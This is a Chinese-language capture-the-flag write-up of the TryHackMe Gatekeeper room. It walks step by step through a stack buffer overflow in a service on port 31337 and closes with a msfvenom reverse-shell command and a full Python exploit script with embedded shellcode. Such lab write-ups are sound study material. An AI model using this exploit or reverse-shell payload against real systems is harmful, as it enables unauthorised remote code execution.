TryHackMe-Gatekeeper

TryHackMe-Gatekeeper

文章目录

• 概述
• 题目
• • 目标文件获取
  • 触发异常
  • 确认偏移
  • 确认偏移
  • 测试坏字符
  • 获取返回地址
  • shellcode
  • 溢出利用代码

概述

继续TryHackMe靶场文章，本次的靶机为Gatekeeper，靶机地址https://tryhackme.com/room/gatekeeper，以缓冲区溢出为主，缓冲区溢出是软件开发时的常见漏洞，也是Offensive的OSCP认证的知识点之一。

题目 目标文件获取

靶机启动后得到IP地址10.10.234.114，通过Nmap扫描发现smb共享，下载目标文件getekeeper.exe


在Windows上，双击gatekeeper.exe启动程序，通过tasklist /svc | findstr /I gatekeeper发现进程为2912，通过netstat -ano | findstr 2912发现程序监听31337端口

连接测试

触发异常

使用Immunity加载程序，配置其工作目录

!mona config -set workingfolder c:mona%p

测试程序为

import socket

ip = '192.168.81.217'
timeout = 5

for i in range(1,11):
    junk = "A" * 100 * i
    buffer = junk + 'n'
    print(len(junk))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    s.connect((ip, 31337))
    s.send(buffer)
    data = s.recv(1024)
    s.close()

运行到200字节崩溃

在Immunity中看到EIP为41414141，即A

确认偏移

使用metasploit生成长度200的字符串

msf-pattern_create -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag

import socket

ip = '192.168.81.217'
timeout = 5


junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag"
buffer = junk + 'n'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect((ip, 31337))
s.send(buffer)
data = s.recv(1024)
print(data)
s.close()

在Immunity中

!mona findmsp -distance 200

发现EIP处现实偏移位146

确认偏移

import socket

ip = '192.168.81.217'
timeout = 5

junk = 'A' * 146
buffer = junk + 'B'*4 + 'n'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
s.connect((ip, 31337))
s.send(buffer)
data = s.recv(1024)
print(data)
s.close()

可以看到EIP为42424242，即B

测试坏字符

重新加载程序，在Imminity中执行

!mona bytearray -b "x00"

import socket

ip = '192.168.81.217'

offset = 146

badchar = "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"

payload = 'A' * offset + 'B' * 4 + badchar

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 31337))
s.send(payload + 'n')
data = s.recv(1024)
print(data)
s.close()

在Imminity中执行

!mona compare -f C:monagatekeeperbytearray.bin -a 006019F8

得到坏字符x00x0a

获取返回地址

得到返回地址

080414C3
或
080416BF

shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.81.198 LPORT=4444 EXITFUNC=thread -b "x00x0a" -f c

溢出利用代码

import socket

ip = '192.168.81.217'

offset = 146
ret_address = 'xC3x14x04x08'

shellcode = ("xddxc0xd9x74x24xf4xbaxe2x4fx27x01x5ex29xc9xb1"
"x52x83xeexfcx31x56x13x03xb4x5cxc5xf4xc4x8bx8b"
"xf7x34x4cxecx7exd1x7dx2cxe4x92x2ex9cx6exf6xc2"
"x57x22xe2x51x15xebx05xd1x90xcdx28xe2x89x2ex2b"
"x60xd0x62x8bx59x1bx77xcax9ex46x7ax9ex77x0cx29"
"x0exf3x58xf2xa5x4fx4cx72x5ax07x6fx53xcdx13x36"
"x73xecxf0x42x3axf6x15x6exf4x8dxeex04x07x47x3f"
"xe4xa4xa6x8fx17xb4xefx28xc8xc3x19x4bx75xd4xde"
"x31xa1x51xc4x92x22xc1x20x22xe6x94xa3x28x43xd2"
"xebx2cx52x37x80x49xdfxb6x46xd8x9bx9cx42x80x78"
"xbcxd3x6cx2exc1x03xcfx8fx67x48xe2xc4x15x13x6b"
"x28x14xabx6bx26x2fxd8x59xe9x9bx76xd2x62x02x81"
"x15x59xf2x1dxe8x62x03x34x2fx36x53x2ex86x37x38"
"xaex27xe2xefxfex87x5dx50xaex67x0ex38xa4x67x71"
"x58xc7xadx1axf3x32x26xe5xacx6dx70x8dxaex8dx6d"
"x12x26x6bxe7xbax6ex24x90x23x2bxbex01xabxe1xbb"
"x02x27x06x3cxccxc0x63x2exb9x20x3ex0cx6cx3ex94"
"x38xf2xadx73xb8x7dxcex2bxefx2ax20x22x65xc7x1b"
"x9cx9bx1axfdxe7x1fxc1x3exe9x9ex84x7bxcdxb0x50"
"x83x49xe4x0cxd2x07x52xebx8cxe9x0cxa5x63xa0xd8"
"x30x48x73x9ex3cx85x05x7ex8cx70x50x81x21x15x54"
"xfax5fx85x9bxd1xdbxa5x79xf3x11x4ex24x96x9bx13"
"xd7x4dxdfx2dx54x67xa0xc9x44x02xa5x96xc2xffxd7"
"x87xa6xffx44xa7xe2")


payload = 'A' * offset + ret_address + 'x90' * 16 + shellcode + 'n'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 31337))
s.send(payload)
data = s.recv(1024)
print(data)
s.close()

修改IP地址为TryHackMe靶机地址即可溢出获取shell，得到初始立足点。